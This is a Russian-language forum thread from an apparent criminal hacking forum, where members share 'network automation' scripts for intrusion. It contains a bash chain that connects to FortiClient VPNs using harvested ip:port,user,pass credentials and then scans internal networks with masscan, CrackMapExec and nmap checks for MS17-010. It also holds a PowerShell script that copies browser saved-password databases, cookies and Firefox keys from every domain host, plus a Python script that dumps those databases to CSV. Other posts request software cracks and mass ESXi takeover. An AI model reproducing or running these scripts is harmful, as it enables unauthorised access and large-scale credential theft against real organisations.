• XSS.stack #1 – первый литературный журнал от юзеров форума

Автоматизация работы в сети (список полезных скриптов)

Отслеживать
GribnoiKot сказал(а):
кстати, мячик давно под линь уже есть.

На линукс кряка нет рабочего? за 3к брать его бред, а на триалке он бесполезен
 
la-of-sh сказал(а):
VPN_ADAPTER_NAME=$(ip route |grep -E -o "vpn[0-9A-Za-z]{1,20}"|uniq);
Можно вот эту строку расшифровать?
ip route выдает типа:
default dev ppp0 scope link
default via 10.0.2.2 dev eth0 metric 4294961769
10.0.2.0/24 dev eth0 proto kernel scope link src 10.0.2.15 metric 100
x.x.x.x via 10.0.2.2 dev eth0
169.254.2.1 dev ppp0 proto kernel scope link src 10.212.134.200
нету vpn, что он должен сгрепить?
 
под винду есть кряк для последней версии? старый не работает
kamzzzzz сказал(а):
На линукс кряка нет рабочего? за 3к брать его бред, а на триалке он бесполезен
 
kamzzzzz сказал(а):
Можно вот эту строку расшифровать?
ip route выдает типа:

нету vpn, что он должен сгрепить?
ppp0, и надо маску добавить 169.254.2.1/24
grep находит строки с регулярным выражением "vpn[0...
-E опция испльзования рег. выраж
-о опция вывода совподающих строк
{1,20} длина от 1 до 20 символов

эти команды хорошо сочитаются с forticlient vpn connect
 
например:
echo -e "1.1.1.1\n443" | forticlient vpn edit 1.1.1.1
forticlient vpn connect 1.1.1.1 -u test -password

делаем скан

forticlient vpn disconnect

next)

еще дорабатывется внедрением expect
 
la-of-sh сказал(а):
ppp0, и надо маску добавить 169.254.2.1/24
grep находит строки с регулярным выражением "vpn[0...
-E опция испльзования рег. выраж
-о опция вывода совподающих строк
{1,20} длина от 1 до 20 символов

эти команды хорошо сочитаются с forticlient vpn connect
[-] FAIL: failed to detect MAC address of interface: "ppp0"
 
Для новичков может быть полезно. Немного автоматизации для ускорения проверки фортиков. Зависит от версии форти клиента подставляем forticlient vpn или fortivpn далее меняем креды в формате ip:port,user,pass на выходе получаем примерную картину сети.
CREDENTIALS="222.222.222.222:443,test,test123" && IFS=',' read -ra PARTS <<< "$CREDENTIALS" && IP_PORT="${PARTS[0]}" && USER="${PARTS[1]}" && PASS="${PARTS[2]}" && IFS=':' read -ra IP_PORT_PARTS <<< "$IP_PORT" && IP="${IP_PORT_PARTS[0]}" && PORT="${IP_PORT_PARTS[1]}" && { echo -e "$IP\n$PORT" | forticlient vpn edit "$IP"; expect -c "spawn forticlient vpn connect $IP -p $PORT -u $USER; expect \"password:\" {send \"$PASS\\r\"}; interact"; }

mkdir ./$IP
touch ./$IP/ranges.txt
cd ./$IP
ip route | awk '/vpn/ {print $1}' > ranges.txt;
sleep 2;
VPN_ADAPTER_NAME=$(ip route | grep -E -o "vpn[0-9A-Za-z]{1,20}" | uniq); sudo masscan -p445,443,3389,88 --open -iL ./ranges.txt -oX ./masscan_results --rate=2000 --ping --open-only --adapter $VPN_ADAPTER_NAME;

for port in 443 445 88 3389; do grep "$port" ./masscan_results | cut -d "=" -f3 | cut -d '"' -f2 > "${port}.txt"; wc -l "./${port}.txt"; done
cme smb ./445.txt
nmap -v -p 3389,445 -iL ./88.txt --script rdp-ntlm-info,smb-os-discovery -Pn -oN ./88_2.txt
nmap -p 443 -iL ./443.txt --script vmware-version -oN ./esxi.txt
nmap -v -p 445 -iL ./445.txt --script smb-vuln-ms08-067,smb-vuln-ms17-010 -oN ./ms17.txt
cd ..
forticlient vpn disconnect
 
Чем собраные sqlite файлы читать?
HEINZ сказал(а):
Vsem privet! reshil podelitsya svoim scriptom dlya sbora infy o polzakax so vsego domena. Ispolzovat` luchse vsego kogda uzhe est` DA (nuzhen dostup k C$:\), na etape ohoty na adminov
v papke iz kotoroy vypolnyaete skrip, nuzho polozhit serv.txt so spiskom vseh interesuyushix servakow/workstatioon (Netbios names)



C#: 
$serverList = Get-Content -Path .\serv.txt
$username = 'domain.local\Administrator';
$password = 'pasa';
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;

$files = @(
    [Tuple]::Create('AppData\Local\Google\Chrome\User Data\Default\History', 'Chrome.sqlite'),
    [Tuple]::Create('AppData\Local\Google\Chrome\User Data\Default\Login Data', 'ChromePWD.sqlite'),
    [Tuple]::Create('AppData\Local\Microsoft\Edge\User Data\Default\History', 'Edge.sqlite')
   
    )

New-PSDrive -Name target -PSProvider FileSystem -Root "." | Out-Null


while($true){  
foreach($server in $serverList) {
       Write-Host "Starting to pocess ${server}"
try {
    New-PSDrive -Name source -PSProvider FileSystem -Root \\$server\C$ -Credential $credential | Out-Null
    $users =  Get-ChildItem source:\users -Directory
    Write-Host $users
    foreach($user in $users) {
        #Write-Host "Starting to pocess ${user}@${server}"  
        foreach($file in $files) {
            try {
                      Write-Host source:\users\$user\$($file.item1)
                    $fname = Split-Path -Path ${file}.item2 -Leaf
                    if(Test-Path source:\users\$user\$($file.item1)){
                        # $rnd = Get-Random
                        $fn = "${server}_${user}_${fname}"
                        Write-Host "file will be saved as ${fn}"
                        Copy-Item -Path source:\users\$user\$($file.item1) -Destination $fn
                    }
                }
                catch {
                  Write-Host "An error occurred on copy:"
                      Write-Host $_
                }    
        }
        try {
                    if(Test-Path source:\users\$user\AppData\Roaming\Mozilla\Firefox\Profiles){
                         Write-Host "Found Mozzila profiles"
                          New-Item ${server}_${user}_FF_PROFILES -Type Directory
                     Get-ChildItem -Path source:\users\$user\AppData\Roaming\Mozilla\Firefox\Profiles -Recurse -Include logins.json,key4.db,cookies.sqlite,cert9.db,profile.ini,signons.sqlite | Copy-Item -Destination ${server}_${user}_FF_PROFILES   -Recurse
        }}    catch {
                  Write-Host "An error occurred on copy of FF profiles:"
                      Write-Host $_
                }    

            if(!(Test-Path "${server}_${user}_Desktop")){
                  gci -r  source:\users\$user\Desktop   | Out-File -FilePath "${server}_${user}_Desktop.txt"
             }  
           

             if(!(Test-Path "${server}_${user}_Documents"))    {
                 gci -r  source:\users\$user\Documents | Out-File -FilePath "${server}_${user}_Documents.txt"
             }

      if(!(Test-Path "${server}_${user}_Downloads"))    {
                 gci -r  source:\users\$user\Documents | Out-File -FilePath "${server}_${user}_Documents.txt"
             }
           
    }
    Remove-PSDrive source
}
catch {
  Write-Host "An error occurred on psdrive:"
  Write-Host $_
  Remove-PSDrive source
}
}

}

po vyvodu mozhno bystro ponyat, gde kto sidit, u kogo chto na rabochem stole i dokax, u kogo sohraneny paroli v chrome, i srazu poluchit vse FF paroli so vsego domena ispolzuya https://github.com/Unode/firefox_decrypt.git ili podobnye tulzy

chast` s FF pravda tupit nemnogo: `Get-ChildItem -Path source:\users\$user\AppData\Roaming\Mozilla\Firefox\Profiles -Recurse`, v powershell 5 mozhno sdelat` -maxDepth 2, no v ugodu sovmestimosti ostavil kak est`

Vsem udachnoy ohoty
 
@network1 bryanross, python one love:

Python: 
import csv
import sqlite3
import os

inputdir = '/media/veracrypt3/WORK/SQLITES/'
fileList = os.listdir(inputdir)
out = '/media/veracrypt3/WORK/TEXT/'
for db_file in fileList:
    try:
         # print(db_file)
         conn = sqlite3.connect(inputdir + db_file , isolation_level=None,detect_types=sqlite3.PARSE_COLNAMES)
         cursor = conn.cursor()
         #cursor.execute("select * from logins;")
         #cursor.execute("select * from urls;")
         cursor.execute("select * from downloads;")

         #with open(out+db_file+"_logins.csv", "w", newline='') as csv_file:  # Python 3 version   
         #with open(out+db_file+"_urls.csv", "w", newline='') as csv_file:  # Python 3 version   
         with open(out+db_file+"_downloads.csv", "w", newline='') as csv_file:  # Python 3 version   
            csv_writer = csv.writer(csv_file)
            csv_writer.writerow([i[0] for i in cursor.description]) # write headers
            csv_writer.writerows(cursor)
         print ("Success for " + db_file)
    except  Exception as e:
        print ( e)
        pass

na vyhode - kucha .csv files, po kotorym legko iskat
v *PWD.sqlite nuzhna tablica logins, v drugih - urls/downloads, nu i sovetuyu chere sqlite browser samim posmotret na paru baz, mb chto eshe v vashem keyse budet interesnoe
 
назрел вопрос, как нибудь можно полуавтоматизировать-автоматизировать процесс "накрыва" есхи массово,если в сети допустим 100+ хостов есхи? вручную делать очень геморройно
вот очень интересный софт для автоматизации в одном из отчетов ИБ.
 

Вложения

  • dsdasd.png
    dsdasd.png
    41.4 КБ · Просмотры: 138
Пожалуйста, обратите внимание, что пользователь заблокирован
kamzzzzz сказал(а):
На линукс кряка нет рабочего? за 3к брать его бред, а на триалке он бесполезен
Поищи в гугл, вбил запрос - нашел какие то варианты, но проверяй на вири
 
kamzzzzz сказал(а):
На линукс кряка нет рабочего? за 3к брать его бред, а на триалке он бесполезен
давно пора форумом скинуться и будет счастье :)
думаю человек 10-20 точно собереться
 
Desconocido сказал(а):
назрел вопрос, как нибудь можно полуавтоматизировать-автоматизировать процесс "накрыва" есхи массово,если в сети допустим 100+ хостов есхи? вручную делать очень геморройно
вот очень интересный софт для автоматизации в одном из отчетов ИБ.
поделись пожалуйста ссылкой на отчет
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх